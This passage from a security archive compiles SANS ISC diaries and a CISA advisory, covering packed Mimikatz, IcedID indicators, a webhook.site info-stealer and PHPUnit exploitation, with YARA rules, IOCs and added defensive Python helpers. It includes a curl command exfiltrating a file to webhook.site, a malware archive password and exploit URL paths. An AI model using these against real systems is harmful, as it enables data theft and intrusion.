Category Archives: Security

A Review of Year 2021, (Sat, Dec 4th)

This post was originally published on this site

We are well on our way to closing 2021, and looking back at this year, it is easy to see that 2021 has been dominated by phishing and ransomware. With zero-day exploits in their possession, threat actors have been looking for new ways to target supply chains, source code, firmware and industrial control systems (ICS).

For nearly 2 years now, COVID has accelerated the move to the cloud, which opens the door to attacks, widens the attack surface and creates new challenges for protecting data. In the first few months of this year, several Microsoft Exchange zero-day vulnerabilities affected several thousand organizations, soon followed by SolarWinds, which led to compromises on-premises and in the cloud.

Ransomware targeted and affected a wide range of organizations: the actors stole their data, encrypted it, then threatened to leak it unless a ransom was paid. The actor(s) then look for something embarrassing or sensitive that could be used as a threat to leak or sell to others. In some cases, they might research whether a potential victim's insurance covers ransom payments. Some of the most publicized ransomware attacks were the US Colonial Pipeline[1], Newfoundland health services in Canada[2] and the supply chain attack against Kaseya[3], to name a few.

What could be done to help defend against phishing? Phishing and compromise of exposed Remote Desktop Protocol (RDP) have been a main vector for ransomware (RDP activity Diary[4]); protect and monitor TCP/3389 for suspicious activity. Something else that can help is to set up DMARC[5] in your DNS records to protect against domain spoofing. Patch and audit software to ensure the latest patches have been applied, or that risks that cannot be remediated are known, accepted and monitored for suspicious activity. Finally, keep good backups that have been checked, tested and verified and that can be used to restore data.

What other tricks could help fight phishing and ransomware? Share them via our comment section.

[1] https://www.cnn.com/2021/08/16/tech/colonial-pipeline-ransomware/index.html
[2] https://www.cbc.ca/news/canada/newfoundland-labrador/nl-cyber-attack-worst-canada-1.6236210
[3] https://www.zdnet.com/article/kaseya-ransomware-attack-1500-companies-affected-company-confirms/
[4] https://isc.sans.edu/forums/diary/Remote+Desktop+Protocol+RDP+Discovery/27984
[5] https://mxtoolbox.com/dmarc/details/how-to-setup-dmarc

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The UPX Packer Will Never Die!, (Fri, Dec 3rd)

Today, many malware samples that you can find in the wild are "packed". The process of packing an executable file is not new and does not mean that the file is de facto malicious. Many developers decide to pack their software to protect the code. But why is malware so often packed? Because packing slows down the malware analyst's job and defeats many static analysis tools. The advantages of packed malware (from an attacker's point of view) are (amongst others):

  • A reduced amount of readable strings
  • A reduced imports table
  • Modified entry point (start of the real program)

There are many packers in the wild. Some are publicly available, others are self-developed by the attackers. Most of them do not provide an "unpacker", which means that you can't easily revert to the original code. The best-known packer is probably "UPX"[1]. Available for years on both Linux and Windows, it does a good job and… includes an unpacker! This means that it's very easy to revert to the original file.

Yesterday, I spotted an interesting PowerShell script that drops a PE file on the file system. I always start with a quick static analysis and saw this:

remnux@remnux:/MalwareZoo/20211203$ peframe cohernece.exe 

--------------------------------------------------------------------------------
File Information (time: 0:00:20.671049)
--------------------------------------------------------------------------------
filename         cohernece.exe
filetype         PE32 executable (GUI) Intel 80386, for MS Windows, UPX compress
filesize         53027
hash sha256      f55fb3ca7a43327157b2862390290c3df7ddf84b891f856ae720ff8a4e198b31
virustotal       /
imagebase        0x400000
entrypoint       0x1d540
imphash          d64d0be2c077062bee61cde37db4cf3e
datetime         2019-11-22 12:55:39
dll              False
directories      import, tls, resources, relocations
sections         UPX0, .rsrc, UPX1 *
features         packer

--------------------------------------------------------------------------------
Yara Plugins
--------------------------------------------------------------------------------
UPXv20MarkusLaszloReiser
UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser
UPX20030XMarkusOberhumerLaszloMolnarJohnReiser
IsPE32
IsWindowsGUI
IsPacked
HasOverlay
HasRichSignature

--------------------------------------------------------------------------------
Behavior
--------------------------------------------------------------------------------
Xor

--------------------------------------------------------------------------------
Packer
--------------------------------------------------------------------------------
PackerUPX CompresorGratuito wwwupxsourceforgenet
UPX wwwupxsourceforgenet additional
yodas Protector v1033 dllocx Ashkbiz Danehkar h
UPX v0896 v102 v105 v124 Markus Laszlo overlay
UPX v0896 v102 v105 v124 Markus Laszlo overlay additional
UPX wwwupxsourceforgenet

--------------------------------------------------------------------------------
Sections Suspicious
--------------------------------------------------------------------------------
UPX1             7.90

--------------------------------------------------------------------------------
Import function
--------------------------------------------------------------------------------
ADVAPI32.dll     1
KERNEL32.DLL     4
MSVCRT.dll       1
NETAPI32.dll     1
USER32.dll       1

--------------------------------------------------------------------------------
Possibile Breakpoint
--------------------------------------------------------------------------------
ExitProcess
GetProcAddress
LoadLibraryA
VirtualProtect

--------------------------------------------------------------------------------
File
--------------------------------------------------------------------------------
ADVAPI32.dll     Library
KERNEL32.DLL     Library
MSVCRT.dll       Library
NETAPI32.dll     Library
USER32.dll       Library

--------------------------------------------------------------------------------
Fuzzing
--------------------------------------------------------------------------------
String too long

You can see plenty of indicators that confirm we are dealing with a UPX-packed sample:

  • YARA rules hit
  • The name of sections ("UPX0", "UPX1")
  • A high entropy
  • A reduced imports table with functions related to memory management ("VirtualProtect")
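
The section-name and entropy indicators listed above can be checked without any PE library. The following is an added example, not code from the diary or from peframe: it walks the PE section table with struct and computes per-section Shannon entropy. The 7.0 threshold and the constructed sample image are assumptions made for the example.

```python
import hashlib
import math
import struct


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for byte in data:
        counts[byte] += 1
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in counts if c)


def pe_sections(image: bytes):
    """Yield (name, raw_bytes) for every entry in the PE section table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (pe_off,) = struct.unpack_from("<I", image, 0x3C)           # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (count,) = struct.unpack_from("<H", image, pe_off + 6)      # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", image, pe_off + 20)  # SizeOfOptionalHeader
    table = pe_off + 24 + opt_size
    for i in range(count):
        entry = table + 40 * i                                  # 40-byte section header
        name = image[entry:entry + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, entry + 16)
        yield name, image[raw_ptr:raw_ptr + raw_size]


def triage(image: bytes, threshold: float = 7.0) -> dict:
    """Report UPX-style section names and sections with entropy >= threshold.

    The 7.0 default is an assumption for this example, not a value from the diary.
    """
    upx_named, high_entropy = [], []
    for name, raw in pe_sections(image):
        if name.upper().startswith("UPX"):
            upx_named.append(name)
        entropy = shannon_entropy(raw)
        if entropy >= threshold:
            high_entropy.append((name, round(entropy, 2)))
    return {
        "upx_named": upx_named,
        "high_entropy": high_entropy,
        # Entropy does not depend on section names, so it still fires
        # when a modified packer uses different names.
        "likely_packed": bool(upx_named or high_entropy),
    }


def build_sample() -> bytes:
    """Constructed PE-like image: headers, section table and data only (not loadable)."""
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))
    sections = [(b"UPX0", b""), (b"UPX1", packed), (b".rsrc", b"constructed resource " * 32)]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    data_off = len(dos) + len(coff) + 40 * len(sections)
    table, body = b"", b""
    for name, raw in sections:
        table += name.ljust(8, b"\0")
        table += struct.pack("<IIII", 0x1000, 0, len(raw), data_off + len(body))
        table += b"\0" * 16
        body += raw
    return dos + coff + table + body


if __name__ == "__main__":
    print(triage(build_sample()))
```
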

Since UPX is open source, there are many forks of the project, and attackers can easily fork the original project and introduce small changes. The result is that the default (official) UPX tools won't be able to unpack the malware. Example:

remnux@remnux:/MalwareZoo/20211203$ upx -d test.exe 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: test.exe: CantUnpackException: file is possibly modified/hacked/protected; take care!

Unpacked 0 files.

But, this time, the attacker used the official UPX version and I just unpacked it:

remnux@remnux:/MalwareZoo/20211203$ upx -d cohernece-packed.exe 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
    107299 <-     53027   49.42%    win32/pe     cohernece-packed.exe

Unpacked 1 file.
remnux@remnux:/MalwareZoo/20211203$ shasum -a 256 cohernece-packed.exe 
2b9aaa9c33b5b61f747d03e79a22706c79a58a5a838017ffa2452a1f1f8183bd  cohernece-packed.exe

The unpacked PE file is a good old Mimikatz.

I don't know why the attacker still used the default UPX in this case. Except to defeat automatic triage and basic controls, it does not slow down the Malware Analyst… 

[1] https://github.com/upx/upx

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AA21-336A: APT Actors Exploiting CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus

Original release date: December 2, 2021

Summary

This joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9. See the ATT&CK for Enterprise framework for referenced threat actor techniques and for mitigations.

This joint advisory is the result of analytic efforts between the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) to highlight the cyber threat associated with active exploitation of a newly identified vulnerability (CVE-2021-44077) in Zoho ManageEngine ServiceDesk Plus—IT help desk software with asset management.

CVE-2021-44077, which Zoho rated critical, is an unauthenticated remote code execution (RCE) vulnerability affecting all ServiceDesk Plus versions up to, and including, version 11305. This vulnerability was addressed by the update released by Zoho on September 16, 2021 for ServiceDesk Plus versions 11306 and above. The FBI and CISA assess that advanced persistent threat (APT) cyber actors are among those exploiting the vulnerability. Successful exploitation of the vulnerability allows an attacker to upload executable files and place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files. 

The Zoho update that patched this vulnerability was released on September 16, 2021, along with a security advisory. Additionally, an email advisory was sent to all ServiceDesk Plus customers with additional information. Zoho released a subsequent security advisory on November 22, 2021, and advised customers to patch immediately.

The FBI and CISA are aware of reports of malicious cyber actors likely using exploits against CVE-2021-44077 to gain access [T1190] to ManageEngine ServiceDesk Plus, as early as late October 2021. The actors have been observed using various tactics, techniques and procedures (TTPs), including:

  • Writing webshells [T1505.003] to disk for initial persistence
  • Obfuscating and Deobfuscating/Decoding Files or Information [T1027 and T1140]
  • Conducting further operations to dump user credentials [T1003]
  • Living off the land by only using signed Windows binaries for follow-on actions [T1218]
  • Adding/deleting user accounts as needed [T1136]
  • Stealing copies of the Active Directory database (NTDS.dit) [T1003.003] or registry hives
  • Using Windows Management Instrumentation (WMI) for remote execution [T1047]
  • Deleting files to remove indicators from the host [T1070.004]
  • Discovering domain accounts with the net Windows command [T1087.002]
  • Using Windows utilities to collect and archive files for exfiltration [T1560.001]
  • Using custom symmetric encryption for command and control (C2) [T1573.001]

The FBI and CISA are proactively investigating this malicious cyber activity:

  • The FBI leverages specially trained cyber squads in each of its 56 field offices and CyWatch, the FBI’s 24/7 operations center and watch floor, which provides around-the-clock support to track incidents and communicate with field offices across the country and partner agencies. 
  • CISA offers a range of no-cost cyber hygiene services to help organizations assess, identify, and reduce their exposure to threats. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors. 

Sharing technical and/or qualitative information with the FBI and CISA helps empower and amplify our capabilities as federal partners to collect and share intelligence and engage with victims, while working to unmask and hold accountable those conducting malicious cyber activities.

A STIX file will be provided when available.

Technical Details

Compromise of the affected systems involves exploitation of CVE-2021-44077 in ServiceDesk Plus, allowing the attacker to:

  1. Achieve an unrestricted file upload through a POST request to the ServiceDesk REST API URL and upload an executable file, C:\ManageEngine\Servicedesk\bin\msiexec.exe, with a SHA256 hash of ecd8c9967b0127a12d6db61964a82970ee5d38f82618d5db4d8eddbb3b5726b7. This executable file serves as a dropper and contains an embedded, encoded Godzilla JAR file.
  2. Gain execution for the dropper through a second POST request to a different REST API URL, which will then decode the embedded Godzilla JAR file and drop it to the filepath C:\ManageEngine\ServiceDesk\lib\tomcat\tomcat-postgres.jar with a SHA256 hash of 67ee552d7c1d46885b91628c603f24b66a9755858e098748f7e7862a71baa015.

Confirming a successful compromise of ManageEngine ServiceDesk Plus may be difficult—the attackers are known to run clean-up scripts designed to remove traces of the initial point of compromise and hide any relationship between exploitation of the vulnerability and the webshell.

Targeted Industries 

APT cyber actors have targeted Critical Infrastructure Sector industries, including the healthcare, financial services, electronics and IT consulting industries.

Indicators of Compromise 

Network Indicators

POST requests sent to the following URLs:

/RestAPI/ImportTechnicians?step=1

Domains:

seed.nkn[.]org

Note: the domain seed.nkn[.]org is a New Kind of Network (NKN) domain that provides legitimate peer to peer networking services utilizing blockchain technology for decentralization. It is possible to have false positive hits in a corporate network environment and it should be considered suspicious to see any software-initiated contacts to this domain or any subdomain.

Log File Analysis

  • Check serverOut*.txt log files under C:\ManageEngine\ServiceDesk\logs for suspicious log entries matching the following format:
    • [<time>]|[<date>]|[com.adventnet.servicedesk.setup.action.ImportTechniciansAction]|[INFO]|[62]: fileName is : msiexec.exe]
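
The log check described above can be scripted. The following is an added example, not part of the advisory: it parses ImportTechniciansAction "fileName is" entries in the format shown and flags msiexec.exe as the advisory's indicator. Flagging other executable extensions for review goes beyond the advisory and is an assumption, as are the sample log lines and their timestamp layout.

```python
import glob
import os
import re

# Matches the entry format quoted in the advisory; the trailing "]" is optional.
ENTRY = re.compile(
    r"^\[(?P<time>[^\]]*)\]\|\[(?P<date>[^\]]*)\]\|"
    r"\[com\.adventnet\.servicedesk\.setup\.action\.ImportTechniciansAction\]\|"
    r"\[(?P<level>[^\]]*)\]\|\[(?P<num>\d+)\]: fileName is : (?P<file>.*?)\]?\s*$"
)

# Assumption for this example: extensions that deserve a second look.
EXECUTABLE_EXT = (".exe", ".dll", ".jar", ".jsp", ".bat", ".ps1")


def classify(file_name):
    """Return 'ioc' for the advisory's file name, 'review' for other executables."""
    base = re.split(r"[\\/]", file_name.strip().lower())[-1]
    if base == "msiexec.exe":
        return "ioc"
    if base.endswith(EXECUTABLE_EXT):
        return "review"
    return None


def scan_lines(lines, source="<memory>"):
    """Return one dict per suspicious ImportTechniciansAction entry."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = ENTRY.match(line.rstrip("\r\n"))
        if not match:
            continue
        verdict = classify(match["file"])
        if verdict:
            hits.append({
                "source": source, "line": number, "time": match["time"],
                "date": match["date"], "file": match["file"], "verdict": verdict,
            })
    return hits


def scan_logs(log_dir):
    """Scan every serverOut*.txt file in log_dir."""
    hits = []
    for path in sorted(glob.glob(os.path.join(log_dir, "serverOut*.txt"))):
        with open(path, encoding="utf-8", errors="replace") as handle:
            hits.extend(scan_lines(handle, source=path))
    return hits


_ACTION = "com.adventnet.servicedesk.setup.action.ImportTechniciansAction"
# Constructed sample lines; timestamps and the non-matching logger name are made up.
SAMPLE_LINES = [
    f"[10:14:02:117]|[11-03-2021]|[{_ACTION}]|[INFO]|[62]: fileName is : technicians.csv]",
    f"[10:15:40:902]|[11-03-2021]|[{_ACTION}]|[INFO]|[62]: fileName is : msiexec.exe]",
    "[10:15:41:004]|[11-03-2021]|[example.OtherAction]|[INFO]|[62]: fileName is : msiexec.exe]",
    f"[10:20:00:000]|[11-03-2021]|[{_ACTION}]|[INFO]|[71]: fileName is : Update.DLL]",
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LINES):
        print(hit)
```

An empty result does not clear a host: as the advisory states, the actors are known to run clean-up scripts that remove traces of the initial compromise.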

Filepaths

C:\ManageEngine\ServiceDesk\bin\msiexec.exe
C:\ManageEngine\ServiceDesk\lib\tomcat\tomcat-postgres.jar
C:\Windows\Temp\ScriptModule.dll
C:\ManageEngine\ServiceDesk\bin\ScriptModule.dll
C:\Windows\system32\ME_ADAudit.exe
c:\Users\[username]\AppData\Roaming\ADManager\ME_ADManager.exe
%ALLUSERPROFILE%\Microsoft\Windows\Caches\system.dat
C:\ProgramData\Microsoft\Crypto\RSA\key.dat
c:\windows\temp\ccc.exe

Tactics, Techniques, and Procedures

  • Using WMI for lateral movement and remote code execution (in particular, wmic.exe)
  • Using plaintext credentials for lateral movement
  • Using pg_dump.exe to dump ManageEngine databases
  • Dumping NTDS.dit and SECURITY/SYSTEM/NTUSER registry hives
  • Active credential harvesting through LSASS (KDC Sponge)
  • Exfiltrating through webshells
  • Conducting exploitation activity often through other compromised U.S. infrastructure
  • Dropping multiple webshells and/or implants to maintain persistence
  • Using renamed versions of WinRAR, csvde, and other legitimate third-party tools for reconnaissance and exfiltration

Yara Rules

rule ReportGenerate_jsp {
   strings:
      $s1 = "decrypt(fpath)"
      $s2 = "decrypt(fcontext)"
      $s3 = "decrypt(commandEnc)"
      $s4 = "upload failed!"
      $s5 = "sevck"
      $s6 = "newid"
   condition:
      filesize < 15KB and 4 of them
}

rule EncryptJSP {
   strings:
      $s1 = "AEScrypt"
      $s2 = "AES/CBC/PKCS5Padding"
      $s3 = "SecretKeySpec"
      $s4 = "FileOutputStream"
      $s5 = "getParameter"
      $s6 = "new ProcessBuilder"
      $s7 = "new BufferedReader"
      $s8 = "readLine()"
   condition:
      filesize < 15KB and 6 of them
}

rule ZimbraImplant {
    strings:
        $u1 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
        $u2 = "Content-Type: application/soap+xml; charset=UTF-8"
        $u3 = "/service/soap"
        $u4 = "Good Luck :::)"
        $s1 = "zimBR"
        $s2 = "log10"
        $s3 = "mymain"
        $s4 = "urn:zimbraAccount"
        $s5 = "/service/upload?fmt=extended,raw"
        $s6 = "<query>(in:\"inbox\" or in:\"junk\") is:unread</query>"
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 2MB and 1 of ($u*) and 3 of ($s*)
}

rule GodzillaDropper {
    strings:
        $s1 = "UEsDBAoAAAAAAI8UXFM" // base64 encoded PK/ZIP header
        $s2 = "../lib/tomcat/tomcat-postgres.jar"
        $s3 = "RunAsManager.exe"
        $s4 = "ServiceDesk"
        $s5 = "C:\\Users\\pwn\\documents\\visual studio 2015\\Projects\\payloaddll"
        $s6 = "CreateMutexA"
        $s7 = "cplusplus_me"
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 350KB and 4 of them
}

rule GodzillaJAR {
    strings:
        $s1 = "org/apache/tomcat/SSLFilter.class"
        $s2 = "META-INF/services/javax.servlet.ServletContainerInitializer"
        $s3 = "org/apache/tomcat/MainFilterInitializer.class"
    condition:
        uint32(0) == 0x04034B50 and filesize < 50KB and all of them
}

rule APT_NGLite {
    strings:
        $s1 = "/mnt/hgfs/CrossC2-2.2"
        $s2 = "WHATswrongwithU"
        $s3 = "//seed.nkn.org:"
        $s4 = "Preylistener"
        $s5 = "preyid"
        $s6 = "Www-Authenticate"
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 15MB and 4 of them
}

rule KDCSponge {
    strings:
        $k1 = "kdcsvc.dll"
        $k2 = "kdccli.dll"
        $k3 = "kdcsvs.dll"
        $f1 = "KerbHashPasswordEx3"
        $f2 = "KerbFreeKey"
        $f3 = "KdcVerifyEncryptedTimeStamp"
        $s1 = "download//symbols//%S//%S//%S" wide
        $s2 = "KDC Service"
        $s3 = "system.dat"
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 1MB and 1 of ($k*) and 1 of ($f*) and 1 of ($s*)
}

Mitigations

Compromise Mitigations

Organizations that identify any activity related to ManageEngine ServiceDesk Plus indicators of compromise within their networks should take action immediately. 

Zoho ManageEngine ServiceDesk Plus build 11306, or higher, fixes CVE-2021-44077. ManageEngine initially released a patch for this vulnerability on September 16, 2021. A subsequent security advisory was released on November 22, 2021, and advised customers to patch immediately. Additional information can be found in the Zoho security advisory released on November 22, 2021.

In addition, Zoho has set up a security response plan center that provides additional details, a downloadable tool that can be run on potentially affected systems, and a remediation guide.

FBI and CISA also strongly recommend domain-wide password resets and double Kerberos TGT password resets if any indication is found that the NTDS.dit file was compromised. 

Note: Implementing these password resets should not be taken as a comprehensive mitigation in response to this threat; additional steps may be necessary to regain administrative control of your network. Refer to your specific products mitigation guidance for details. 

Actions for Affected Organizations

Immediately report as an incident to CISA or the FBI (refer to Contact information section below) the existence of any of the following:

  • Identification of indicators of compromise as outlined above.
  • Presence of webshell code on compromised ServiceDesk Plus servers.
  • Unauthorized access to or use of accounts.
  • Evidence of lateral movement by malicious actors with access to compromised systems.
  • Other indicators of unauthorized access or compromise.

Contact Information

Recipients of this report are encouraged to contribute any additional information that they may have related to this threat. 

For any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:

Revisions

  • December 2, 2021: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

TA551 (Shathak) pushes IcedID (Bokbot), (Thu, Dec 2nd)

Introduction

TA551 (also known as Shathak) represents a threat actor behind malspam that has pushed different families of malware over the past few years.  So far this week, TA551 is pushing IcedID (Bokbot).


Shown above:  Flow chart for this infection.

Images from an infection


Shown above:  Screenshot from a TA551 email with sensitive information removed.

Indicators of Compromise (IOCs)

The infection process was similar to my previous diary about TA551 from August 2021, but this time it delivered IcedID instead of BazarLoader.

Associated malware:

SHA256 hash: d68fb04c96e925efcdb3484669365bed0cda22a272e486e99a43f9626019d31c

  • File size: 38,958 bytes
  • File name: request.zip
  • File description: Password-protected zip archive attached to email
  • Password: 55egs

SHA256 hash: 0a42f6762ae4f3b1d95aae0f8977cde6361f1d59b5ccc400c41772db0205f7c5

  • File size: 34,322 bytes
  • File name: charge_12.01.2021.doc
  • File description: Word doc with macros for IcedID

SHA256 hash: c7f40608ce8a3dda25c13d117790d08ef757b07b8c2ccb645a27a71adc322fb2

  • File size: 3,342 bytes
  • File location: C:\Users\[username]\Documents\youTube.hta
  • File description: HTA file dropped after enabling Word macros

SHA256 hash: d54a870ba5656c5d3ddfab5f7f325c2fb8ee256b25e2872847c5ff244bc6ee6e

  • File size: 257,672 bytes
  • File location: hxxp://winrentals2017b[.]com/tegz/[long string of characters]/cab3?ref=[long string of characters]
  • File location: C:\Users\Public\dowNext.jpg
  • File description: Installer DLL for IcedID
  • Run method: regsvr32.exe [filename]

SHA256 hash: cfc202b44509f2f607d365858a8218dfdc6b26f8087efcc5e46f4fef9ab53705

  • File size: 341,898 bytes
  • File location: C:Users[username]AppDataRoamingReliefEightlicense.dat
  • File description: license.dat data binary used to run persistent IcedID DLL

SHA256 hash: c340ae2dde2bd8fbae46b15abef0c7e706fe8953c837329bde409959836d6510

  • File size: 116,224 bytes
  • File location: C:Users[username]AppDataRoaming{24DB904E-86F7-2F2C-B7C1-85D8BBCE1181}MiapGiowcosi64.dll
  • File description: persistent IcedID DLL
  • Run method: rundll32.exe [filename],DllMain --giqied="[path to license.dat]"

IcedID traffic:

  • 143.204.155[.]37 port 443 – aws.amazon[.]com – HTTPS traffic
  • 87.120.254[.]190 port 80 – normyils[.]com – GET / HTTP/1.1
  • 87.120.8[.]98 port 443 – baeswea[.]com – HTTPS traffic
  • 91.92.109[.]95 port 443 – bersaww[.]com – HTTPS traffic

Final words

IcedID can be followed by Cobalt Strike when an infected host is part of an Active Directory (AD) environment.  These types of infections can deliver ransomware as a final payload in real-world environments.

But decent spam filters and best security practices can help you avoid IcedID. Default security settings in Windows 10 and Microsoft Office 2019 should prevent these types of infections from happening.

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Info-Stealer Using webhook.site to Exfiltrate Data, (Wed, Dec 1st)

We have already reported multiple times that, when you offer an online (cloud) service, there is a good chance that it will be abused for malicious purposes. I spotted an info-stealer that exfiltrates data through webhook.site. Today, many Python scripts use Discord as a C2 communication channel. This time, it is something different that looks definitely less suspicious.

webhook.site is an online service that helps you to test webhooks. By definition, a webhook[1] is a technique used to modify a page or an application with custom callbacks. They are also often used to automate data manipulations. Webhooks are perfect to receive JSON data through HTTP POST requests.

The malicious tool is Hazard-Token-Grabber-V2, which has been available on GitHub[2] for a few days. Currently, it has a very low VT score: 3/56[3]. The script extracts a lot of information from the infected system:

  • Username
  • ComputerName
  • IP
  • City
  • Region
  • Country
  • Google Maps Location
  • Screenshot of their pc
  • All Their Valid Discord Tokens (bypasses betterdiscord's anti-token-grab-protector)
  • Password For Discord (You get Their Password if They Update it)
  • Their Whole Credit Card (if They Put one in)
  • All Their Chrome Passwords And Cookies

How does webhook.site work? When you visit the page, it generates a unique webhook for you. Now you can send HTTP POST requests to it and watch the hits. For example, my webhook was:

https://webhook.site/4accef15-fa3b-4926-a853-2b020accd3a2

I sent this request:

$ echo "This is a far file" >file.txt
$ curl -X POST --data-binary @file.txt hxxps://webhook[.]site/4accef15-fa3b-4926-a853-2b020accd3a2

Data is instantly received by the webhook that the attacker is probably monitoring:

A very efficient and stealthy way to exfiltrate data!

[1] https://en.wikipedia.org/wiki/Webhook
[2] https://github.com/Rdimo/Hazard-Token-Grabber-V2
[3] https://www.virustotal.com/gui/file/efe6d18849828e14855b0f493652183b39c7553621b78b89a05157705314a7b4/details

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Hunting for PHPUnit Installed via Composer, (Tue, Nov 30th)

One rather persistent pattern in our honeypot logs is attacks against older PHPUnit flaws. These attacks appear to exploit CVE-2017-9841, a simple remote code execution vulnerability [1]. Back in 2019, Imperva called it "one of the most exploitable CVEs of 2019", and even now, attacks keep coming in [2]. After tuning one of our honeypots to be more sensitive to these attacks, we saw one to two thousand attacks against the honeypot a day (the honeypot covers multiple IP addresses).

Number of attacks/day exploiting CVE-2017-9841

So why is a four-year-old vulnerability still so popular? Looking at the exploited URLs, one pattern that emerged is the inclusion of WordPress plugins and other addons that administrators may install via composer. The most common URLs are:

/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/modules/gamification/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/modules/autoupgrade/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/modules/ps_facetedsearch/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
...

One issue may be that administrators installing these plugins and extensions are not aware that they will also install and enable PHPUnit along with the respective extension. A typical composer.json file used to install the extension will include an entry like

"require-dev": {
    "phpunit/phpunit": "^6.2.2"
},

The example above includes version 6.2.2 or later of PHPUnit if the respective module is installed with the "dev" option (composer install --dev). Luckily, only PHPUnit before 5.6.3 or 4.8.27 is vulnerable. I took a quick look at the respective composer.json files, and none of the current files requires such an old version (if it is still available). But I guess, given the heavy scanning for this vulnerability, there may still be sufficient numbers of vulnerable systems around.

This is also more of a "composer" problem than a WordPress problem. While WordPress remains a favorite target of attackers due to its popularity, composer, like many similar technologies (npm, pip…), obscures some of the dependencies installed automatically and makes inventorying dependencies more difficult. As a quick test, you could run this command:

find . -name 'composer.json' -exec egrep -H phpunit {} \;

to find all composer.json files that include a reference to PHPUnit.
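
composer.json only states a version constraint; the version that was actually installed is recorded in composer.lock. The following added example (not from the diary) walks a directory tree, reads each composer.lock, reports the installed phpunit/phpunit version and checks whether eval-stdin.php is present on disk. The version ranges are the ones in the NVD entry cited as [1] (before 4.8.28, and 5.x before 5.6.3); the function names are chosen for this example.

```python
import json
import os
import re
import sys

# Path probed by the scans listed above, relative to the directory holding composer.lock.
EVAL_STDIN = os.path.join("vendor", "phpunit", "phpunit", "src", "Util", "PHP", "eval-stdin.php")


def parse_version(text):
    """'v5.6.2' -> (5, 6, 2); returns None for branch aliases such as 'dev-master'."""
    match = re.match(r"v?(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(part or 0) for part in match.groups()) if match else None


def in_vulnerable_range(version):
    """CVE-2017-9841 per NVD: before 4.8.28, and 5.x before 5.6.3. None means unknown."""
    if version is None:
        return None
    return version < (4, 8, 28) or (5, 0, 0) <= version < (5, 6, 3)


def hunt(root):
    """Return one finding per phpunit/phpunit entry in any composer.lock under root."""
    findings = []
    for directory, _subdirs, files in os.walk(root):
        if "composer.lock" not in files:
            continue
        try:
            with open(os.path.join(directory, "composer.lock"), encoding="utf-8") as handle:
                lock = json.load(handle)
        except (OSError, ValueError):
            continue  # unreadable or malformed lock file
        if not isinstance(lock, dict):
            continue
        for key in ("packages", "packages-dev"):
            for package in lock.get(key) or []:
                if package.get("name") != "phpunit/phpunit":
                    continue
                version = package.get("version", "")
                findings.append({
                    "project": os.path.relpath(directory, root),
                    "version": version,
                    "dev_only": key == "packages-dev",
                    "vulnerable": in_vulnerable_range(parse_version(version)),
                    # The lock file can say "dev only" while the file is still deployed.
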